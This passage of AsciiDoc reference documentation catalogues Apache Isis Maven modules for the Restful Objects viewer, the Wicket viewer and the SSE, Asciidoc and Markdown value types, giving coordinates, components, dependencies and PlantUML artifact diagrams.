+\no.a.i.viewer.restfulobjects.rendering.service.swagger.SwaggerServiceDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ClassExcluderDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.SwaggerSpecGenerator +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.TaggerDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ValuePropertyFactoryDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/rendering\/IResourceContext.adoc[IResourceContext], xref:refguide:viewer:index\/restfulobjects\/rendering\/IsisModuleRestfulObjectsRendering.adoc[IsisModuleRestfulObjectsRendering], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/RepresentationService.adoc[RepresentationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/acceptheader\/AcceptHeaderServiceForRest.adoc[AcceptHeaderServiceForRest], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationService.adoc[ContentNegotiationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceAbstract.adoc[ContentNegotiationServiceAbstract], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceForRestfulObjectsV1_0.adoc[ContentNegotiationServiceForRestfulObjectsV1_0], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV1.adoc[ContentNegotiationServiceOrgApacheIsisV1], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV2.adoc[ContentNegotiationServiceOrgApacheIsisV2], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceXRoDomainType.adoc[ContentNegotiationServiceXRoDomainType], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/swagger\/SwaggerServiceMenu.adoc[SwaggerServiceMenu]\n****\n\n|Apache Isis Viewer - RO (Testing)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-testing\nType: jar\nDirectory: \/viewers\/restfulobjects\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\n****\n\n|Apache Isis Viewer - RO (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-viewer\nType: jar\nDirectory: \/viewers\/restfulobjects\/viewer\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForObjectNotFound +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRestfulObjectsApplication +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRuntimeException +\no.a.i.viewer.restfulobjects.viewer.resources.DomainObjectResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainServiceResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainTypeResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.HomePageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.ImageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.MenuBarsResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.SwaggerSpecResource +\no.a.i.viewer.restfulobjects.viewer.resources.UserResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.VersionResourceServerside +\n****\n\n.Dependencies\n****\ncom.fasterxml.jackson.module:jackson-module-jaxb-annotations:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/viewer\/IsisModuleViewerRestfulObjectsViewer.adoc[IsisModuleViewerRestfulObjectsViewer]\n****\n|===\n\n=== Wicket\n\n[plantuml,Wicket,svg]\n----\n@startuml(id=Wicket)\ntitle Wicket - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Wicket\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Wicket\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - Wicket (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - Wicket (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - Wicket (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Wicket)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket\nType: pom\nDirectory: \/viewers\/wicket\n----\n|\n\n|Apache Isis Viewer - Wicket (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-model\nType: jar\nDirectory: \/viewers\/wicket\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/model\/IsisModuleViewerWicketModel.adoc[IsisModuleViewerWicketModel]\n****\n\n|Apache Isis Viewer - Wicket (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-ui\nType: jar\nDirectory: \/viewers\/wicket\/ui\n----\n|.Components\n****\no.a.i.viewer.wicket.ui.app.logout.LogoutHandlerWkt +\no.a.i.viewer.wicket.ui.components.widgets.themepicker.IsisWicketThemeSupportDefault +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-extensions:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-themes:jar:<managed> +\nde.agilecoders.wicket.webjars:wicket-webjars:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-model:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-devutils:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.webjars:jquery-ui:jar:<managed> +\norg.webjars:select2:jar:<managed> +\norg.webjars.bower:summernote:jar:<managed> +\norg.wicketstuff:wicketstuff-select2:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/ui\/IsisModuleViewerWicketUi.adoc[IsisModuleViewerWicketUi]\n****\n\n|Apache Isis Viewer - Wicket (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-viewer\nType: jar\nDirectory: \/viewers\/wicket\/viewer\n----\n|.Components\n****\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistrarDefault +\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassListDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageNavigationServiceDefault +\no.a.i.viewer.wicket.viewer.services.BookmarkUiServiceWicket +\no.a.i.viewer.wicket.viewer.services.DeepLinkServiceWicket +\no.a.i.viewer.wicket.viewer.services.HintStoreUsingWicketSession +\no.a.i.viewer.wicket.viewer.services.ImageResourceCacheClassPath +\no.a.i.viewer.wicket.viewer.services.LocaleProviderWicket +\no.a.i.viewer.wicket.viewer.services.TranslationsResolverWicket +\no.a.i.viewer.wicket.viewer.services.WicketViewerSettingsDefault +\no.a.i.viewer.wicket.viewer.services.mementos.ObjectMementoServiceWicket +\no.a.i.viewer.wicket.viewer.webmodule.WebModuleWicket +\n****\n\n.Dependencies\n****\ncommons-io:commons-io:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nnet.ftlines.wicket-source:wicket-source:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/viewer\/IsisModuleViewerWicketViewer.adoc[IsisModuleViewerWicketViewer], xref:refguide:viewer:index\/wicket\/viewer\/mixins\/Object_clearHints.adoc[Object_clearHints]\n****\n|===\n\n== Valuetypes\n\n[plantuml,Valuetypes,svg]\n----\n@startuml(id=Valuetypes)\ntitle Valuetypes - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Valuetypes\\n[Software System]\" {\n rectangle \"==Apache Isis Val - SSE (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Server Sent Events\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Server Sent Events (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Server Sent Events (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Server Sent Events (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Value types\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n6 .[#707070].> 7 : \"\"\n3 .[#707070].> 6 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Valuetypes)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Value types\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes\nType: pom\nDirectory: \/valuetypes\n----\n|Value types for use within Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse\nType: pom\nDirectory: \/valuetypes\/sse\n----\n|Dynamically updating HTML markup\n\n|Apache Isis Val - Server Sent Events\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-applib\nType: jar\nDirectory: \/valuetypes\/sse\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/applib\/IsisModuleValSseApplib.adoc[IsisModuleValSseApplib], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/ServerSentEvents.adoc[ServerSentEvents], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/SseSource.adoc[SseSource], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseChannel.adoc[SseChannel], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseService.adoc[SseService]\n****\n\n|Apache Isis Val - Server Sent Events (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-metamodel\nType: jar\nDirectory: \/valuetypes\/sse\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.sse.metamodel.facets.SseAnnotationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - SSE (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui\nType: pom\nDirectory: \/valuetypes\/sse\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui-wkt\nType: jar\nDirectory: \/valuetypes\/sse\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Parented +\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Standalone +\no.a.i.valuetypes.sse.ui.wkt.services.SseServiceDefault +\no.a.i.valuetypes.sse.ui.wkt.webmodule.WebModuleServerSentEvents +\n****\n\n.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-sse-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/ui\/wkt\/IsisModuleValSseUiWkt.adoc[IsisModuleValSseUiWkt], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/services\/SseServiceDefault.adoc[SseServiceDefault], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/webmodule\/WebModuleServerSentEvents.adoc[WebModuleServerSentEvents]\n****\n|===\n\n=== Asciidoc\n\n[plantuml,Asciidoc,svg]\n----\n@startuml(id=Asciidoc)\ntitle Asciidoc - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Asciidoc\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Asciidoctor (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Asciidoctor (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Asciidoctor (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Asciidoctor (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Asciidoctor (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Asciidoctor (ui vaadin)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Asciidoctor (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Val - Asciidoctor (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Asciidoc)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Asciidoctor (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc\nType: pom\nDirectory: \/valuetypes\/asciidoc\n----\n|Asciidoc value type.\n\n|Apache Isis Val - Asciidoctor (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-applib\nType: jar\nDirectory: \/valuetypes\/asciidoc\/applib\n----\n|.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj-api:jar:${asciidoctorj.version} +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/applib\/IsisModuleValAsciidocApplib.adoc[IsisModuleValAsciidocApplib], xref:refguide:valuetypes:index\/asciidoc\/applib\/jaxb\/AsciiDocJaxbAdapter.adoc[AsciiDocJaxbAdapter], xref:refguide:valuetypes:index\/asciidoc\/applib\/value\/AsciiDoc.adoc[AsciiDoc]\n****\n\n|Apache Isis Val - Asciidoctor (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-metamodel\nType: jar\nDirectory: \/valuetypes\/asciidoc\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocMetaModelRefiner +\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/metamodel\/IsisModuleValAsciidocMetaModel.adoc[IsisModuleValAsciidocMetaModel]\n****\n\n|Apache Isis Val - Asciidoctor (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence\nType: pom\nDirectory: \/valuetypes\/asciidoc\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Asciidoctor (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/asciidoc\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/IsisModuleValAsciidocPersistenceJdoDn5.adoc[IsisModuleValAsciidocPersistenceJdoDn5], xref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/converters\/IsisAsciiDocConverter.adoc[IsisAsciiDocConverter]\n****\n\n|Apache Isis Val - Asciidoctor (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui\nType: pom\nDirectory: \/valuetypes\/asciidoc\/ui\n----\n|.Dependencies\n****\ncom.github.jnr:jnr-constants:jar:0.10.1 +\ncom.github.jnr:jnr-enxio:jar:0.32.4 +\ncom.github.jnr:jnr-posix:jar:3.1.5 +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:${asciidoctorj.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui vaadin)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-vaa\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/vaadin\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.vaa.components.AsciiDocFieldFactoryVaa +\n****\n\n.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:${project.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-wkt\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Standalone +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/ui\/wkt\/IsisModuleValAsciidocUiWkt.adoc[IsisModuleValAsciidocUiWkt]\n****\n|===\n\n=== Markdown\n\n[plantuml,Markdown,svg]\n----\n@startuml(id=Markdown)\ntitle Markdown - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Markdown\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Markdown (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Markdown (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Markdown (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Markdown (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Markdown (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Markdown (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Markdown (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Markdown)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Markdown (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown\nType: pom\nDirectory: \/valuetypes\/markdown\n----\n|Markdown value type.\n\n|Apache Isis Val - Markdown (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-applib\nType: jar\nDirectory: \/valuetypes\/markdown\/applib\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/applib\/IsisModuleValMarkdownApplib.adoc[IsisModuleValMarkdownApplib], xref:refguide:valuetypes:index\/markdown\/applib\/jaxb\/MarkdownJaxbAdapter.adoc[MarkdownJaxbAdapter], xref:refguide:valuetypes:index\/markdown\/applib\/value\/Converter.adoc[Converter]\n****\n\n|Apache Isis Val - Markdown (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-metamodel\nType: jar\nDirectory: \/valuetypes\/markdown\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.markdown.metamodel.MarkdownMetaModelRefiner +\no.a.i.valuetypes.markdown.metamodel.MarkdownValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/metamodel\/IsisModuleValMarkdownMetaModel.adoc[IsisModuleValMarkdownMetaModel]\n****\n\n|Apache Isis Val - Markdown (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence\nType: pom\nDirectory: \/valuetypes\/markdown\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/markdown\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/IsisModuleValMarkdownPersistenceJdoDn5.adoc[IsisModuleValMarkdownPersistenceJdoDn5], xref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/converters\/IsisMarkdownConverter.adoc[IsisMarkdownConverter]\n****\n\n|Apache Isis Val - Markdown (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui\nType: pom\nDirectory: 